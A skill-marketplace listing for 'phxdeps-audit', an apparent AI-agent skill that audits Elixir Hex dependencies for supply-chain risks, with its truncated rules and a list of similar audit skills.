phxdeps-audit

Solid

Audit Hex deps for supply-chain security risk — bidi chars, compile-time exec, maintainer changes, typosquats, CVEs. Use after mix deps.update, when checking if a package upgrade is safe, or reviewing mix.lock PR diffs.

Code & Development 384 stars 25 forks Updated 4 days ago MIT

Install

View on GitHub

Quality Score: 95/100

Stars 20%

Recency 20%

100

Frontmatter 20%

Documentation 15%

100

Issue Health 10%

License 10%

100

Description 5%

100

Skill Content

# Hex Dependency Audit Non-mutating supply-chain audit for Hex packages. Runs an 8-rule MVP catalogue against changed packages, enriches with Hex API metadata, wraps existing tools (`mix hex.audit`, `mix_audit`, OSV-Scanner), and emits a triage table. ## When to Use - After `mix deps.update` or `mix deps.get` brought in new versions - On PRs that touch `mix.lock` (pre-merge gate) - Before manually updating a single package (`--preview <pkg>`) - When investigating a dependency you don't recognize ## Iron Laws 1. **NEVER claim a diff is clean without inspecting it.** Run all 8 rules on the unpacked NEW tarball. "Looks fine" without a tool run is a false pass. **Always write `.claude/deps-audit/last-run.json`** — its absence is evidence the audit didn't actually run. 2. **NEVER install `mix_audit` / `osv-scanner` — even if asked.** Detect, warn with install instructions, skip cleanly if missing. If the user says "install it," respond with the install command (e.g., `mix deps.add mix_audit --only dev`) and **do not execute it**. The audit skill is non-mutating; `mix.exs` / `mix.lock` are off-limits regardless of consent. 3. **NEVER promote a finding to BLOCK without rule citation.** Every finding shows `rule_id`, `severity`, `file:line`, `snippet`, `message`. No handwaving. 4. **NEVER fetch from Hex API without rate-limiting.** Cap at 5 req/sec. Cache metadata 7 days, top-500 list 1 day. 5. **NEVER run the audit on already-committed lock chan...

Details

Author: oliver-kriska
Repository: oliver-kriska/claude-elixir-phoenix
Created: 3 months ago
Last Updated: 4 days ago
Language: Python
License: MIT

Integrates with

Model Context Protocol · AI

Similar Skills

Semantically similar based on skill content — not just same category

Code & Development Solid

phxdeps-vet

Record a vetted Hex package version in hex_vet.exs after a security review — manages the audit ledger, not the scanner. Use to approve a dep after /phx:deps-audit findings or to initialize hex_vet.exs.

384 Updated 4 days ago

oliver-kriska

AI & Automation Listed

dependency-audit

Provides dependency management and supply chain security practices for auditing vulnerabilities, checking licenses, assessing dependency health, and managing upgrades safely. Use when auditing packages, reviewing security, managing dependencies, or when user mentions 'audit', 'vulnerability', 'dependency', 'supply chain', 'npm audit', 'license', 'bundle size'.

62 Updated today

Tibsfox

Code & Development Listed

dx-audit

Audit and improve developer experience in a codebase by inspecting README, quickstart, scripts, contributing guide, env docs, error messages, and tooling, scoring onboarding friction, and reporting findings or implementing fixes. Use when a new contributor hits friction, when setup is undocumented, or when the README has not been run on a clean checkout since the stack changed.

0 Updated 6 days ago

HermeticOrmus

AI & Automation Listed

devsecops-supply-chain-audit

Audit software supply chain across every ecosystem (npm, pip, Go, Ruby, Cargo, Maven, Docker, Terraform) — pinning, vulnerabilities, secrets, SBOM, signing, branch protection, CODEOWNERS. One sub-agent per ecosystem. Three modes.

3 Updated today

anthril

AI & Automation Listed

deps

Audit dependency risks and updates.

375 Updated today

boshu2